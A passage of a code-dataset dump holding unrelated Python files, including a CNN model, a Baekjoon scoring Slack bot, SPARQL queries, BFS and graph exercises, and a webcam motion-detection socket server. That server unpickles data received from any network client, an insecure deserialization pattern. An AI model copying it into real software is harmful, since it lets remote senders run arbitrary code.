\n\t\t\t\t})\n\t\t\tself.output_accuracy_list.append(output_accuracy)\n\t\t\tself.output_loss_list.append(output_loss)\n\t\t\tprint(\"Iteration\", str(i),\"\\t|Validation Loss = \", str(minibatch_loss),\"\\t|Validation Accuracy =\", str(minibatch_accuracy),\"\\nIteration\", str(i),\"\\t|Test Loss = \", str(output_loss),\"\\t|Test Accuracy =\", str(output_accuracy))\n\t\t\t","sub_path":"ML_Pipeline.py","file_name":"ML_Pipeline.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"514843936","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 10 19:49:25 2019\r\n\r\n@author: 李奇\r\n\"\"\"\r\nimport torch\r\nfrom torch import nn, optim\r\nfrom torch.utils.data import DataLoader\r\nimport numpy as np\r\nimport utils\r\nimport torch.nn.functional as F\r\n\r\ndef conv1x1(in_channels,out_channels,bias=True,groups=1):\r\n return nn.Conv2d(in_channels,out_channels,kernel_size=1,stride=1,padding=0,bias=bias,groups=groups)\r\n\r\nclass CNNmodel(nn.Module):\r\n def __init__(self,input_size=32, class_num=10):\r\n super(CNNmodel, self).__init__()\r\n \r\n self.input_size = input_size\r\n self.class_num = class_num\r\n\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(1, 64, 3,padding=1), \r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(64, 64, 3, 2, 1), \r\n nn.LeakyReLU(0.2),\r\n #16\r\n \r\n nn.Conv2d(64, 128, 3, padding=1), \r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(128, 128, 3, 2, 1), \r\n nn.LeakyReLU(0.2),\r\n #8\r\n \r\n nn.Conv2d(128, 256, 3, padding=1),\r\n nn.LeakyReLU(0.2),\r\n nn.Conv2d(256, 256, 3, 2,1), \r\n nn.LeakyReLU(0.2),\r\n )\r\n\r\n self.cla = conv1x1(256,self.class_num)\r\n\r\n utils.initialize_weights(self)\r\n \r\n def forward(self,input,output_flag=True):\r\n x = self.conv(input)\r\n x=F.avg_pool2d(x, x.data.size()[-2:])\r\n c = self.cla(x)\r\n if output_flag:\r\n c=c.view(c.size(0),c.size(1))\r\n return c\r\n else:\r\n return x\r\n\r\nif __name__=='__main__':\r\n net = CNNmodel(input_size=32,class_num=10)\r\n\r\n input = torch.randn(1,1,32,32)\r\n output = net.forward(input)\r\n \r\n utils.print_network(net)\r\n\r\n\r\n ","sub_path":"demo_cnn32/cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"161051038","text":"from subprocess import check_output\n\nfrom subprocess import STDOUT \nimport subprocess\n\nfiles = [\"GoodWalk.qk\"\n,\"LexChallenge.qk\"\n,\"Pt.qk\"\n,\"Sqr.qk\"\n,\"SqrDecl.qk\"\n,\"TypeWalk.qk\"\n,\"bad_break.qk\"\n,\"bad_escape.qk\"\n,\"bad_init.qk\"\n,\"hands.qk\"\n,\"not_a_duck.qk\"\n,\"robot.qk\"\n,\"schroedinger.qk\"\n,\"schroedinger2.qk\"]\n\nfor f in files:\n out = check_output(\"./scanner {1}{0} >{2}{0}.out 2>{2}{0}.err\".format(f, \"samples/\", \"actual/\"), shell=True)\n\n","sub_path":"Project1/createActual.py","file_name":"createActual.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482161117","text":"from datetime import datetime, timezone, timedelta\nfrom multiprocessing import Process, Pipe\nfrom baekjoon import parse_submitted_problems, ResultType\nimport slack, db, setting\nimport os\n\nis_debug_mode = os.getenv(\"IS_DEBUG_MODE\").lower()==\"true\"\n\ndef get_solved_problems_by_user(user: dict, submitted_problems: list):\n solved = []\n\n for problem in submitted_problems:\n # 문제가 이전에 풀었던 문제 목록에 있다면 제출로 인정하지 않음\n if 
problem['problem_id'] in user['solved_problems'] and not is_debug_mode:\n continue\n\n if any(map(lambda p: p['problem_id'] == problem['problem_id'], solved)):\n continue\n\n solved.append(problem)\n\n return solved\n\ndef scoring_user(user: dict, start_date: datetime, end_date: datetime):\n correct_problems = parse_submitted_problems(user['user_id'], start_date, end_date, ResultType.Correct)\n solved_problems = get_solved_problems_by_user(user, correct_problems)\n\n has_submitted = len(solved_problems) > 0\n\n result = { \n 'user_id': user['user_id'],\n 'user_name': user['user_name'],\n 'has_submitted': has_submitted\n }\n \n if has_submitted:\n result['solved_problems'] = solved_problems\n result['is_mvp'] = False\n\n print(\"[채점 결과] %s(%s): %d 문제 채점 기록 확인\" % (user['user_name'], user['user_id'], len(solved_problems)))\n else:\n result['fine'] = 1000\n result['total_fine'] = int(user[\"fine\"]) + 1000\n\n print(\"[채점 결과] %s(%s): 벌금 %s원 누적(총 %s원)\" % (user['user_name'], user['user_id'], format(result['fine'],\",\"), format(result['total_fine'],\",\")))\n\n return result\n\ndef post_slack(scoring_results: dict):\n users = len(scoring_results)\n\n submitted = sum(map(lambda result: int(result['has_submitted']), scoring_results))\n unsubmitted = users - submitted\n\n submitted_messages = [\n slack.create_solved_message(\n result['user_id'],\n result['user_name'],\n result['solved_problems'],\n result['is_mvp']\n ) for result in filter(lambda r: r['has_submitted'], scoring_results)\n ]\n\n unsubmitted_messages = [\n slack.create_unsolved_message(\n result['user_id'],\n result['user_name'],\n result['fine'],\n result['total_fine']\n ) for result in filter(lambda r: not r['has_submitted'], scoring_results)\n ]\n\n slack.post_message('📑 문제 검사가 종료되었습니다. ', attachments=[{\n \"text\": '전체 인원 %d명중, 제출은 %d명 미제출은 %d명입니다.' 
% (users, submitted, unsubmitted)\n }])\n\n slack.post_message('📬 제출', attachments=submitted_messages)\n\n slack.post_message('👮‍♀️ 미제출', attachments=unsubmitted_messages)\n\n slack.post_message('📊 벌금통계', attachments=[\n slack.create_chart_message(db.get_all_user())\n ])\n\ndef run():\n if is_debug_mode:\n print(\"[채점 설정] 디버그 모드 켜짐\")\n \n tz = timezone(timedelta(hours=9))\n\n today = datetime.now(tz=tz)\n yesterday = today - timedelta(days=1)\n\n start_date = datetime(yesterday.year, yesterday.month, yesterday.day, tzinfo=tz)\n end_date = datetime(today.year, today.month, today.day, tzinfo=tz)\n\n print(\"[채점 설정] 채점 기간 %s~%s\" % (start_date, end_date))\n\n users = db.get_all_user()\n\n scoring_results = []\n for user in users:\n scoring_results.append(scoring_user(user, start_date, end_date))\n\n print(\"[채점 완료] DB 업데이트 시작\")\n\n # Update scroing result to db\n if not is_debug_mode:\n for result in scoring_results:\n if result['has_submitted']:\n db.update_user_solve_problems_by_id(result['user_id'], list(map(lambda p: p['problem_id'], result['solved_problems'])))\n else:\n db.update_user_fine_by_id(result['user_id'], result['fine'], today)\n\n print(\"[채점 완료] DB 업데이트 종료\")\n\n print(\"[채점 완료] 슬랙 포스트 시작\")\n\n # Post to slack channel\n post_slack(scoring_results)\n\n print(\"[채점 완료] 슬랙 포스트 종료\")\n\n\nif __name__ == \"__main__\":\n run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379842125","text":"import pylab as pl\nimport matplotlib.patches as pt\nimport numpy as np,random as rd\ndef fy(t,k,a,b,c,q,n): \n return np.cos(np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(a*np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(b*np.pi*t/n+2*k*np.pi/q)+\\\n np.cos(c*np.pi*t/n+2*k*np.pi/q)\ndef fx(t,k,a,b,c,q,n): \n return np.sin(np.pi*t/n+2*k*np.pi/q)-\\\n np.sin(a*np.pi*t/n+2*k*np.pi/q)+\\\n np.sin(b*np.pi*t/n+2*k*np.pi/q)-\\\n np.sin(c*np.pi*t/n+2*k*np.pi/q)\ndef rotated_polygon(fig_size):\n a,b,c,q=rd.randint(5,9),rd.randint(10,14),\\\n rd.randint(15,19),2*rd.randint(3,6) \n n=rd.randint(5,17); yl=5.5\n st='$\\mathbb{a=%d; \\; b=%d; \\; c=%d;'+\\\n ' \\; q=%d; \\; n=%d}$'\n L=np.array([[[fx(t,k,a,b,c,q,n),fy(t,k,a,b,c,q,n)] \n for t in range(2*n)] \n for k in range(2*q)])\n LT=[[[1.5*fx(t,k,a,b,c,q,n),1.2*fy(t,k,a,b,c,q,n)] \n for t in range(2*n)] for k in range(2*q)]\n pl.figure(figsize=(fig_size,fig_size))\n ax=pl.gca(); pl.axis('off')\n for k in range(2*q):\n col=np.array([rd.randint(100,900)/1000 \n for l in range(2)]+[1])\n ax.add_patch(pt.Polygon(\n LT[k],alpha=.1,color=col))\n ax.add_patch(pt.Polygon(\n L[k],fill=False,color=col/2,lw=.3))\n pl.title(st%(a,b,c,q,n),\n fontdict={'color':'#9911ff','fontsize':20})\n pl.xlim(-yl,yl); pl.ylim(-yl,yl); pl.show()","sub_path":"python_recipes/rotated_polygon.py","file_name":"rotated_polygon.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"168599771","text":"#-*- coding: utf-8 -*-\n\nimport sys, os\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\nfrom keras.utils import np_utils\nfrom keras.models import load_model\nfrom PIL import Image\nimport numpy as np\n\n\nf = open('../../Classify_ulf/list_category_cloth.csv','r')\n\nwhile(True):\n lines = f.read().splitlines()\n if not lines:\n break\n\n categories = []; tmp_cat = []\n for i, d in enumerate(lines):\n tmp = lines[i]\n num_index = len(lines[i]) - 2 \n 
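# drop the last two characters of the line (the trailing category-type column), keeping only the name\n        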
tmp_cat = tmp[:num_index]\n categories.append(tmp_cat)\n categories.sort()\n\nf.close()\n\nimage_files = ['../../test_img/category_test/greentee.png']\n#image_files = ['../category_test/stripe.jpg','../category_test/denim_pants.png','../category_test/red_dress.jpg','../category_test/red_skirt.png','../category_test/floral_skirt.png','../category_test/navy_pants.png']\n\nimage_size = 64\n\nX = []; files = []\n\nfor fname in image_files:\n img = Image.open(fname)\n img = img.convert(\"RGB\")\n img = img.resize((image_size, image_size))\n in_data = np.asarray(img)\n in_data = in_data.astype(\"float\") / 256\n X.append(in_data)\n files.append(fname)\n\nX = np.array(X)\n\nmodel = load_model('../category_50/clothes_category_model_server_03.h5')\n\npre = model.predict(X)\n\nfor i, p in enumerate(pre):\n y = p.argmax()\n print(\"입력:\", files[i]) # 정답\n print(\"예측:\", \"[\", y, \"]\",categories[y], \"/ Score\",p[y])\n\n\n","sub_path":"server_deepfashion_clothes_type_model_run.py","file_name":"server_deepfashion_clothes_type_model_run.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263352760","text":"import json, urllib, urllib2\nimport math\n\nsparql_endpoint = \"http://data.linkedtv.eu/sparql\"\neditor_tool_attribution = \"\"\n\ndef fetchChapters(id):\n query = chapterQuery(id, False)\n params = {\n \"query\": query,\n \"format\": 'json'\n }\n request = urllib2.Request(sparql_endpoint + '?' + urllib.urlencode(params))\n response = urllib2.urlopen(request)\n data = json.load(response)\n chapters = []\n if data[\"results\"][\"bindings\"]:\n for chapter in data[\"results\"][\"bindings\"]:\n chapters.append(chapterData(chapter))\n\n return chapters\n\ndef chapterData(data):\n url = data[\"chapter\"][\"value\"]\n id = url.split('/')[-1]\n print('chapter '+id)\n startTime = float(data[\"start\"][\"value\"]) * 1000\n if math.isnan(startTime): startTime = 0.0\n endTime = float(data[\"end\"][\"value\"]) * 1000\n\n chapter = {\n \"id\": id,\n \"startTime\": startTime,\n \"endTime\": endTime,\n \"duration\": endTime - startTime,\n \"title\": data[\"label\"][\"value\"]\n }\n if \"poster\" in data:\n chapter[\"image\"] = data[\"poster\"][\"value\"];\n \n return chapter\n\ndef chapterQuery(videoId, attribution):\n if not(attribution):\n attribution = '?attribution'\n\n query = \"\"\" PREFIX linkedtv: \n PREFIX ma: \n PREFIX nsa: \n PREFIX oa: \n PREFIX prov: \n SELECT DISTINCT ?chapter ?start ?end ?label ?poster\n WHERE {\n ?mediafragment ma:isFragmentOf .\n ?annotation oa:hasTarget ?mediafragment .\n ?annotation oa:hasBody ?chapter .\n ?chapter a linkedtv:Chapter .\n ?mediafragment nsa:temporalStart ?start .\n ?mediafragment nsa:temporalEnd ?end .\n ?chapter rdfs:label ?label .\n ?annotation prov:wasAttributedTo %s .\n OPTIONAL {?chapter linkedtv:hasPoster ?poster }\n } ORDER BY ?start \n \"\"\" % (videoId, attribution)\n\n return query\n\n\ndef fetchFragments(videoId, start, end):\n start = int(start/1000)-2\n end = int(end/1000)+2\n query = fragmentQuery(videoId, start, end, False)\n params = {\n \"query\": query,\n \"format\": 'json'\n }\n request = urllib2.Request(sparql_endpoint + '?' 
+ urllib.urlencode(params))\n response = urllib2.urlopen(request)\n data = json.load(response)\n fragments = []\n if data[\"results\"][\"bindings\"]:\n for fragment in data[\"results\"][\"bindings\"]:\n if \"dbpedia.org\" in fragment[\"uri\"][\"value\"]:\n fragments.append(fragmentData(fragment))\n return fragments\n\ndef fragmentData(fragment):\n startTime =float(fragment[\"start\"][\"value\"]) * 1000\n endTime = float(fragment[\"end\"][\"value\"]) * 1000\n \n data = {\n \"title\": fragment[\"label\"][\"value\"],\n \"uri\": fragment[\"uri\"][\"value\"],\n \"startTime\": startTime,\n \"endTime\": endTime,\n \"duration\": endTime - startTime,\n \"confidence\": fragment[\"confidence\"][\"value\"],\n \"relevance\": fragment[\"relevance\"][\"value\"]\n }\n return data\n\ndef fragmentQuery(videoId, start, end, attribution):\n if not(attribution):\n attribution = '?attribution'\n\n query = \"\"\" PREFIX rdf: \n PREFIX rdfs: \n PREFIX owl: \n PREFIX linkedtv: \n PREFIX ma: \n PREFIX oa: \n PREFIX prov: \n SELECT ?item ?uri ?label ?start ?end ?confidence ?relevance\n WHERE { \n ?mediafragment ma:isFragmentOf . \n ?annotation oa:hasTarget ?mediafragment . \n ?annotation oa:hasBody ?item . \n ?item rdf:type linkedtv:Entity . \n ?item rdfs:label ?label .\n ?item owl:sameAs ?uri . \n ?item linkedtv:hasConfidence ?confidence . FILTER (?confidence > 0.4)\n ?item linkedtv:hasRelevance ?relevance . FILTER (?relevance >= 0.2)\n ?mediafragment nsa:temporalStart ?start . FILTER (?start >= %s)\n ?mediafragment nsa:temporalEnd ?end . FILTER (?end <= %s)\n ?annotation prov:wasAttributedTo %s .\n } ORDER BY ?start\n \"\"\" % (videoId, start, end, attribution)\n return query\n\n\n#fetchChapters('adb65e0a-642b-432f-aa86-c296dab0375a')\n#fetchFragments('8a8187f2-3fc8-cb54-0140-7dccd76f0001', 0.0, 240000)","sub_path":"linkedtv_platform.py","file_name":"linkedtv_platform.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"157216032","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct ## new\nimport zlib\n\n# image transfer : https://gist.github.com/kittinan/e7ecefddda5616eab2765fdb2affed1b\n# motion detection: geeksforgeeks.org/webcam-motion-detector-python/\n\nHOST=''\nPORT=8485\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nprint('Socket created')\n\ns.bind((HOST,PORT))\nprint('Socket bind complete')\ns.listen(10)\nprint('Socket now listening')\n\nconn,addr=s.accept()\n\ndata = b\"\"\npayload_size = struct.calcsize(\">L\")\nprint(\"payload_size: {}\".format(payload_size))\n\n# Assigning our static_back to None \nstatic_back = None\n \n# List when any moving object appear \nmotion_list = [ None, None ] \n\nwhile True:\n while len(data) < payload_size:\n print(\"Recv: {}\".format(len(data)))\n data += conn.recv(4096)\n\n print(\"Done Recv: {}\".format(len(data)))\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\">L\", packed_msg_size)[0]\n print(\"msg_size: {}\".format(msg_size))\n while len(data) < msg_size:\n data += conn.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n\n frame=pickle.loads(frame_data, fix_imports=True, encoding=\"bytes\")\n frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)\n\n\n # -------------\n motion = 0\n # Converting color image to gray_scale image \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \n \n # Converting gray scale image to GaussianBlur \n # so that change can be find 
easily \n gray = cv2.GaussianBlur(gray, (21, 21), 0) \n \n # In first iteration we assign the value \n # of static_back to our first frame \n if static_back is None: \n static_back = gray \n continue\n \n # Difference between static background \n # and current frame(which is GaussianBlur) \n diff_frame = cv2.absdiff(static_back, gray) \n \n # If change in between static background and \n # current frame is greater than 30 it will show white color(255) \n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1] \n thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2) \n \n # Finding contour of moving object \n cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n \n for contour in cnts: \n if cv2.contourArea(contour) < 10000: \n continue\n motion = 1\n \n (x, y, w, h) = cv2.boundingRect(contour) \n # making green rectangle around the moving object \n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3) \n \n # Appending status of motion \n motion_list.append(motion) \n \n motion_list = motion_list[-2:] \n\n\n\n # ----------\n\n\n\n \n cv2.imshow('ImageWindow',frame)\n cv2.waitKey(1)","sub_path":"src/rspCamPatt/nServer.py","file_name":"nServer.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"23781479","text":"from scipy.sparse.csgraph import shortest_path\nfrom scipy.sparse import csr_matrix\nimport sys\n\ndef get_path(start, goal, pred):\n return get_path_row(start, goal, pred[start])\n\ndef get_path_row(start, goal, pred_row):\n path = []\n i = goal\n while i != start and i >= 0:\n path.append(i)\n i = pred_row[i]\n if i < 0:\n return []\n path.append(i)\n return path[::-1]\n\nN, M = map(int, input().split())\nA = []\nB = []\nneighbor = [[0 for x in range(N)] for y in range(N)]\nfor i in range(M):\n a, b = map(lambda x: int(x)-1, input().split())\n neighbor[a][b] = 1\n neighbor[b][a] = 1\n\nneighbor = csr_matrix(neighbor)\n\nans = []\nd, p = shortest_path(neighbor, return_predecessors=True, indices=0)\n\nfor i in range(1,N):\n if p[i]<0:\n print(\"No\")\n sys.exit(0)\n else:\n ans.append(p[i]+1)\nprint(\"Yes\")\nfor i in range(N-1):\n print(ans[i])\n","sub_path":"atcoder/ABC/168/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"54465622","text":"# f = lambda:map(int, input().split())\n# n, m = f()\n#\n# g = [''] * n\n#\n# for i in range(n):\n# g[i] = input()\n\nn = 9\nm = 11\nv = [[0] * m for i in range(n)]\ng = ['.#.........',\n '.#.#######.',\n '.#.#.....#.',\n '.#.#.###.#.',\n '.#.#..@#.#.',\n '.#.#####.#.',\n '.#.......#.',\n '.#########.',\n '...........']\n\n# Find the start position\nsi, sj = 0, 0\nfor i in range(n):\n for j in range(m):\n if g[i][j] == '@':\n si = i\n sj = j\nprint('Start coordinates:')\nprint(si, sj)\n\n# Order in which nodes are visited\nl = []\n\n\ndef bfs(i, j):\n c = 0\n # Q is the queue of nodes to visit\n Q = [(i, j)]\n while Q:\n c += 1\n i, j = Q[0]\n l.append((i, j))\n # print(g[i][j])\n # Check the four neighbours (up/down/left/right): enqueue any node that is unvisited, not already waiting in Q, and whose value is '.' 
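# --- Standalone check (not in the submission) of how the predecessor array
# from shortest_path drives get_path_row: for the path graph 0-1-2 with
# indices=0, pred is [-9999, 0, 1], so the route to node 2 unwinds as
# 2 -> 1 -> 0 and get_path_row(0, 2, pred) returns [0, 1, 2].
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import shortest_path

demo = csr_matrix([[0, 1, 0], [1, 0, 1], [0, 1, 0]])
dist, pred = shortest_path(demo, return_predecessors=True, indices=0)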
\n if 0 < j and not v[i][j-1] and (i, j-1) not in Q and g[i][j-1] == '.':\n Q.append((i, j-1))\n if j < m-1 and not v[i][j+1] and (i, j+1) not in Q and g[i][j+1] == '.':\n Q.append((i, j+1))\n if 0 < i and not v[i-1][j] and (i-1, j) not in Q and g[i-1][j] == '.':\n Q.append((i-1, j))\n if i < n-1 and not v[i+1][j] and (i+1, j) not in Q and g[i+1][j] == '.':\n Q.append((i+1, j))\n # mark (i, j)\n v[i][j] = 1\n # Remove the node whose visit is finished from Q\n Q.remove((i, j))\n return c\n\n\n# Run BFS from the start position\nprint(bfs(si, sj))\nprint('Node visit order:')\nprint(l)","sub_path":"algorithm/广度优先搜索(BFS)/nxm的地图.py","file_name":"nxm的地图.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"624241458","text":"class Animal(object):\n def __init__(self, name, weight):\n self.name = name\n self.size = None\n self.weight = weight\n self.species = None\n self.food_type = None\n self.nocturnal = False\n\n def sleep(self):\n if self.nocturnal:\n print(\"{} sleeps at day time\".format(self.name))\n else:\n print(\"{} sleeps at night time\".format(self.name))\n\n def eat(self, food):\n if self.food_type == 'omnivore':\n print(\"{} the {} thinks {} is Yummy!\".format(self.name, self.species, food))\n elif (food == 'meat' and self.food_type == \"carnivore\") or \\\n (food == 'plants' and self.food_type == 'herbivore'):\n print(\"{} the {} thinks {} is Yummy!\".format(self.name, self.species, food))\n else:\n print('I do not eat this!')\n\n\nclass Elephant(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'elephant'\n self.size = 'enormous'\n self.food_type = 'herbivore'\n self.nocturnal = False\n\n\nclass Tiger(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'tiger'\n self.size = 'large'\n self.food_type = 'carnivore'\n self.nocturnal = True\n\n\nclass Raccoon(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'raccoon'\n self.size = 'small'\n self.food_type = 'omnivore'\n self.nocturnal = True\n\n\nclass Gorilla(Animal):\n def __init__(self, name, weight):\n super().__init__(name, weight)\n self.species = 'gorilla'\n self.size = 'large'\n self.food_type = 'herbivore'\n self.nocturnal = False\n\n\ndef add_animal_to_zoo(zoo, animal_type, name, weight):\n if animal_type == \"Gorilla\":\n animal = Gorilla(name, weight)\n elif animal_type == \"Raccoon\":\n animal = Raccoon(name, weight)\n elif animal_type == \"Tiger\":\n animal = Tiger(name, weight)\n else:\n animal = Elephant(name, weight)\n\n return zoo.append(animal)\n\n\ndef feed_animals(zoo, time='Day'):\n for animal in zoo:\n if time == 'Day':\n if not animal.nocturnal:\n if animal.food_type == 'carnivore':\n animal.eat('meat')\n else:\n animal.eat('plants')\n else:\n if animal.nocturnal:\n if animal.food_type == 'carnivore':\n animal.eat('meat')\n else:\n animal.eat('plants')\n\n\nzoo = []\n\nadd_animal_to_zoo(zoo, 'Elephant', \"dumbo1\", 200)\nadd_animal_to_zoo(zoo, 'Elephant', \"dumbo1\", 520)\nadd_animal_to_zoo(zoo, 'Raccoon', \"raccoon1\", 20)\nadd_animal_to_zoo(zoo, 'Raccoon', \"raccoon2\", 12)\nadd_animal_to_zoo(zoo, 'Gorilla', \"gorilla\", 120)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger1\", 70)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger2\", 80)\nadd_animal_to_zoo(zoo, \"Tiger\", \"tiger3\", 75)\n\nfeed_animals(zoo)\nfeed_animals(zoo, 
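# --- Hedged aside on the BFS above: with a plain list, `(i, j) not in Q` and
# Q.remove(...) are O(len(Q)). The standard shape uses collections.deque and
# marks cells as seen when they are enqueued, keeping each step O(1); this is
# an alternative sketch, not the author's code.
from collections import deque

def bfs_count(g, n, m, si, sj):
    seen = [[False] * m for _ in range(n)]
    seen[si][sj] = True
    Q, c = deque([(si, sj)]), 0
    while Q:
        i, j = Q.popleft()
        c += 1
        for ni, nj in ((i, j - 1), (i, j + 1), (i - 1, j), (i + 1, j)):
            if 0 <= ni < n and 0 <= nj < m and not seen[ni][nj] and g[ni][nj] == '.':
                seen[ni][nj] = True
                Q.append((ni, nj))
    return c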
'Night')\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449988190","text":"import numpy as np\nfrom obspy import Stream, UTCDateTime\nfrom pydantic import BaseModel\nfrom typing import Any, List, Optional\n\nfrom ..residual.Reading import Reading, get_absolutes_xyz, get_ordinates\nfrom .. import ChannelConverter\nfrom .. import pydantic_utcdatetime\nfrom .Metric import Metric, get_metric\n\n\nclass AdjustedMatrix(BaseModel):\n \"\"\"Attributes pertaining to adjusted (affine) matrices, applied by the AdjustedAlgorithm\n\n Attributes\n ----------\n matrix: affine matrix generated by Affine's calculate method\n pier_correction: pier correction generated by Affine's calculate method\n starttime: beginning of interval that matrix is valid for\n endtime: end of interval that matrix is valid for\n NOTE: valid intervals are only generated when bad data is encountered.\n Matrix is non-constrained otherwise\n \"\"\"\n\n matrix: Optional[List[List[float]]] = None\n pier_correction: float = 0\n metrics: Optional[List[Metric]] = None\n starttime: Optional[UTCDateTime] = None\n endtime: Optional[UTCDateTime] = None\n time: Optional[UTCDateTime] = None\n\n def process(\n self,\n stream: Stream,\n inchannels=[\"H\", \"E\", \"Z\", \"F\"],\n outchannels=[\"X\", \"Y\", \"Z\", \"F\"],\n ):\n \"\"\"Apply matrix to raw data. Apply pier correction to F when necessary\"\"\"\n raws = np.vstack(\n [\n stream.select(channel=channel)[0].data\n for channel in inchannels\n if channel != \"F\"\n ]\n + [np.ones_like(stream[0].data)]\n )\n adjusted = self.matrix @ raws\n if \"F\" in inchannels and \"F\" in outchannels:\n f = stream.select(channel=\"F\")[0].data + self.pier_correction\n adjusted[-1] = f\n return adjusted\n\n def get_metrics(self, readings: List[Reading]) -> List[Metric]:\n \"\"\"Computes mean absolute error and standard deviation between expected and predicted values\n Metrics are computed for X, Y, Z, and dF values\n\n Attributes\n ----------\n readings: list of valid readings\n matrix: composed matrix\n\n Outputs\n -------\n metrics: list of Metric objects\n \"\"\"\n absolutes = get_absolutes_xyz(readings=readings)\n ordinates = get_ordinates(readings=readings)\n stacked_ordinates = np.vstack((ordinates, np.ones_like(ordinates[0])))\n predicted = self.matrix @ stacked_ordinates\n metrics = []\n elements = [\"X\", \"Y\", \"Z\", \"dF\"]\n expected = list(absolutes) + [\n ChannelConverter.get_computed_f_using_squares(*absolutes)\n ]\n predicted = list(predicted[0:3]) + [\n ChannelConverter.get_computed_f_using_squares(*predicted[0:3])\n ]\n return [\n get_metric(element=elements[i], expected=expected[i], actual=predicted[i])\n for i in range(len(elements))\n ]\n","sub_path":"geomagio/adjusted/AdjustedMatrix.py","file_name":"AdjustedMatrix.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30771444","text":"k = input(\"Enter a number to check for prime : \")\nnum=int(k)\ni=2\nflag = 0\nif (num == 2) :\n print (\"Prime Number\")\nelif num < 2 :\n print (\"Not a Prime Number: please enter an integer greater than or equal to 2\")\nelse :\n while(i <= num/2) :\n if num % i == 0 :\n flag =1\n break\n i = i+1\n if flag == 0: \n print (\"Prime Number\")\n else:\n print (\"Not a Prime Number\")\n","sub_path":"Algorithms/Maths/Prime 
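# --- Illustration (separate from the module) of the homogeneous-coordinate
# trick that process() and get_metrics() both rely on: stacking a row of ones
# lets one 3x4 matrix apply the linear part and a constant offset in a single
# matmul. The shapes and identity matrix are placeholder assumptions.
import numpy as np

h, e, z = np.random.rand(3, 100)           # three raw channels, 100 samples
raws = np.vstack([h, e, z, np.ones(100)])  # 4 x 100 homogeneous ordinates
matrix = np.eye(3, 4)                      # stand-in for a computed affine
adjusted = matrix @ raws                   # 3 x 100 adjusted channels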
Number/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"136192090","text":"import sys\nimport os\nimport logging\nfrom datetime import datetime\nimport tensorflow as tf\nimport json\nimport shutil\n\nsys.path.append('../tf_scripts/')\nsys.path.append('../tf_scripts/architecture/')\n\nfrom tools.basic_logging import initialize_logger\nfrom resnet3D_model import resnet3D\nfrom modules import metrics\nfrom modules.train_singlegpu import train\nfrom io_modules.list_iterator_classification import List_Iterator\nfrom modules import image_summaries\n#from hellsicht.tensorflow.modules.train_multigpu import train\n\n\nfrom config import H\n\ndef train_net():\n\n # Create a new train directory, where to save all.log and config.json\n #H['output_dir'] = 'output_dir/train_dir/%s' % datetime.now().strftime('%Y_%m_%d_%H.%M')\n if not tf.gfile.Exists(H['output_dir']):\n tf.gfile.MakeDirs(H['output_dir'])\n with open(H['output_dir'] + '/config.json', 'w') as conf_file:\n json.dump(H, conf_file, indent = 4)\n \n shutil.copy('../tf_scripts/architecture/model_def/resnet3D.py',H['output_dir']+'/resnet3D.py')\n shutil.copytree('../tf_scripts/architecture/',H['output_dir']+'/architecture')\n shutil.copytree('../tf_scripts/io_modules/',H['output_dir']+'/io_modules') \n initialize_logger(folder=H['output_dir'])\n\n\n with tf.Graph().as_default(), tf.device('/cpu:0'):\n\n 